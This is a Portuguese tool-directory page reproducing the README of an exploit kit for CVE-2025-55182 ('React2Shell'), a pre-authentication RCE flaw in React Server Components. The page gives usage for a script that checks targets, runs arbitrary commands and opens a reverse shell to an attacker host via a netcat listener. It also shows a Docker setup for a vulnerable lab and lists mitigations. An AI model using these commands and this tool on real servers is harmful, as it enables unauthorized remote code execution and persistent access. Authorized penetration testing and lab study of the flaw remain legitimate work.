Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-55182 — Um kit de ferramentas simples para validar, explorar e obter um shell interativo via o RCE react2Shell do Next.js. | Kitploit
Ferramentas/GitHubGitHub/j4ck3lsyn-gen2/cve-2025-55182
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleAprendizado e EducaçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubj4ck3lsyn-gen2/cve-2025-55182

CVE-2025-55182

Um kit de ferramentas simples para validar, explorar e obter um shell interativo via o RCE react2Shell do Next.js.

Ver Repositório
há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-55182: React2Shell - Kit de Execução Remota de Código para Next.js

CVE-2025-55182 CVSS License

[!WARNING] Esta ferramenta é fornecida apenas para testes autorizados e fins educacionais. Acesso não autorizado a redes e exfiltração de dados são ilegais. Os usuários são responsáveis por garantir que possuem autorização adequada antes de usar esta ferramenta em qualquer rede.

Visão Geral

Este repositório contém um kit simples para validar, explorar e obter um shell interativo através do CVE-2025-55182, também conhecido como React2Shell. Esta é uma vulnerabilidade crítica de execução remota de código (RCE) pré-autenticação nos React Server Components (RSC), afetando as versões 19.0.0, 19.1.0, 19.1.1 e 19.2.0.

A vulnerabilidade decorre de desserialização insegura no protocolo Flight do React, permitindo que atacantes não autenticados executem código arbitrário em servidores vulneráveis. Ela foi divulgada em 3 de dezembro de 2025 e possui pontuação CVSS de 10.0 (Crítica). Embora afete principalmente os React Server Components, tem implicações para frameworks como Next.js que utilizam RSC.

Nota: Este kit é destinado apenas a fins educacionais e de pesquisa. A exploração não autorizada de vulnerabilidades é ilegal e antiética. Use com responsabilidade e apenas em sistemas que você possua ou para os quais tenha permissão explícita de testar.

Componentes Afetados

  • React Server Components: Versões 19.0.0, 19.1.0, 19.1.1, 19.2.0
  • Frameworks Relacionados: Next.js (potencialmente via CVE-2025-66478 em alguns contextos)
  • Vetor de Exploração: Desserialização insegura em payloads RSC, permitindo RCE sem autenticação.

Para mais detalhes, consulte os avisos oficiais:

  • NVD CVE-2025-55182
  • Comunicado de Segurança do React
  • Blog da Wiz sobre React2Shell

Uso


Recursos

  • Validação: Verifica se um alvo está vulnerável ao CVE-2025-55182.
  • Exploração: Cria payloads para executar comandos arbitrários.
  • Shell Interativo: Obtenha um shell reverso para acesso persistente.
  • Suporta Python 3.x com dependências mínimas.

Requisitos

  • Python 3.8+
  • Bibliotecas necessárias: requests, argparse (instale via pip install -r requirements.txt)

Instalação

Instalação via Venv

  1. Clone o Repositório
root@kitploit:~
git clone https://github.com/J4ck3LSyN-Gen2/CVE-2025-55182.git
cd CVE-2025-55182
  1. Ambiente Virtual
root@kitploit:~
python3 -m venv CVE202555182Venv
python3 -m pip install -r requirements.txt
  1. Ative
root@kitploit:~
source CVE202555182Venv/bin/activate[.fish]

Instalação Local

  1. Clone o repositório:
    root@kitploit:~
    git clone https://github.com/J4ck3LSyN-Gen2/CVE-2025-55182.git
    cd CVE-2025-55182
    
  2. Instale as dependências:
    root@kitploit:~
    pip install -r requirements.txt
    

Uso

O script principal é sploit.py. Execute-o com as seguintes opções:

root@kitploit:~
python sploit.py --help

Opções

  • --target <URL>: A URL do alvo (ex.: http://vulnerable-site.com).
  • --mode <validate|sploit|shell>: Modo de operação.
    • validate: Verifica a vulnerabilidade sem exploração.
    • sploit: Executa um comando personalizado.
    • shell: Estabelece um shell reverso interativo.
  • --command <CMD>: Comando a executar (necessário no modo sploit).
  • --lhost <IP>: Host local para o shell reverso (necessário no modo shell).
  • --lport <PORT>: Porta local para o shell reverso (padrão: 4444).

Exemplos

  1. Validar Vulnerabilidade:

    root@kitploit:~
    python sploit.py --target http://example.com --mode validate
    
  2. Explorar com Execução de Comando:

    root@kitploit:~
    python sploit.py --target http://example.com --mode sploit --command "whoami"
    
  3. Obter Shell Interativo: Primeiro, configure um listener (ex.: nc -lvnp 4444) e depois:

    root@kitploit:~
    python sploit.py --target http://example.com --mode shell --lhost 192.168.1.100 --lport 4444
    

Como Funciona

  1. Detecção de Vulnerabilidade: Envia um payload RSC especialmente elaborado para detectar falhas de desserialização.
  2. Criação de Payload: Usa desserialização insegura para injetar código via protocolo Flight do React.
  3. Acesso ao Shell: Escala para um shell reverso executando um payload que conecta de volta à máquina do atacante.

Para análises técnicas aprofundadas:

  • Análise do Datadog Security Labs
  • Blog da Dynatrace

Exemplo de Execução


Instalação via Docker

root@kitploit:~

{
  "dependencies": {
    "next": "14.3.0-canary.77",
    "react": "19.0.0",
    "react-dom": "19.0.0"
  },
  "scripts": {
    "dev": "next dev",
    "build": "next build",
    "start": "next start"
  }
}

Exclua o tsconfig.json completamente (esta é a chave que estava quebrando o build)

root@kitploit:~

rm tsconfig.json

Crie os arquivos mínimos necessários do App Router

root@kitploit:~

mkdir -p app

# app/layout.tsx
cat > app/layout.tsx << 'EOF'
import "./globals.css";

export default function RootLayout({
  children,
}: {
  children: React.ReactNode;
}) {
  return (
    <html lang="en">
      <body>{children}</body>
    </html>
  );
}

app/globals.css (pode ser basicamente vazio)

root@kitploit:~
echo "/* minimal css - required by Next.js */" > app/globals.css

app/page.tsx (sua página realmente vulnerável vai aqui – exemplo de stub)

root@kitploit:~
cat > app/page.tsx << 'EOF'
export default function Home() {
  return (
    <main>
      <h1>react2shell lab is running!</h1>
      <p>Start sploiting → /api/vulnerable-endpoint</p>
    </main>
  );
}

Crie o Dockerfile final à prova de falhas (conteúdo exato)

root@kitploit:~

FROM node:20-alpine

WORKDIR /app

# Copy only package files first (better caching)
COPY package*.json ./

# Install dependencies with legacy peer deps (required for this old canary)
RUN npm install --legacy-peer-deps

# Copy the rest of the app
COPY . .

# Remove tsconfig.json so Next.js doesn't try to auto-install TypeScript (this was the killer)
RUN rm -f tsconfig.json

# Build the Next.js app
RUN npm run build

# Expose port
EXPOSE 3000

# Start the app
CMD ["npm", "start"]

Compile e execute (estes comandos agora funcionam perfeitamente)

root@kitploit:~

docker build -t react2shell .
docker run -d -p 3000:3000 --name react2shell react2shell

Abra no navegador

→ http://localhost:3000

Você terminou. O contêiner inicia em menos de 2 segundos e está pronto para cadeias de poluição de protótipo → RCE.

One-liner opcional para remover e reiniciar a qualquer momento:bash

root@kitploit:~
docker rm -f react2shell && docker run -d -p 3000:3000 --name react2shell react2shell

Mitigação

  • Atualize o React para a versão 19.2.1 ou posterior.
  • Desative ou restrinja os React Server Components se não forem necessários.
  • Monitore tentativas de exploração, pois atores patrocinados por estados (ex.: grupos vinculados à China) foram observados atacando este CVE rapidamente.

Veja o Blog de Segurança da AWS para inteligência de ameaças.

Aviso Legal

Esta ferramenta é fornecida "como está", sem garantia. O autor não é responsável por qualquer uso indevido ou dano causado por este kit. Sempre obtenha permissão antes de testar vulnerabilidades.

Contribuição

Pull requests são bem-vindos! Para mudanças importantes, por favor abra uma issue primeiro.

Licença

Este projeto está licenciado sob a Licença MIT - consulte o arquivo LICENSE para detalhes.

Referências

  • Comunicado da Cisco
  • Relatório da Palo Alto Unit 42
  • Notícias do CMU ISO
  • Blog da Cloudflare
  • Blog da Huntress
  • Blog da JFrog
  • Segurança da Elastic
Seu Selo de Imagem
Baixar ferramenta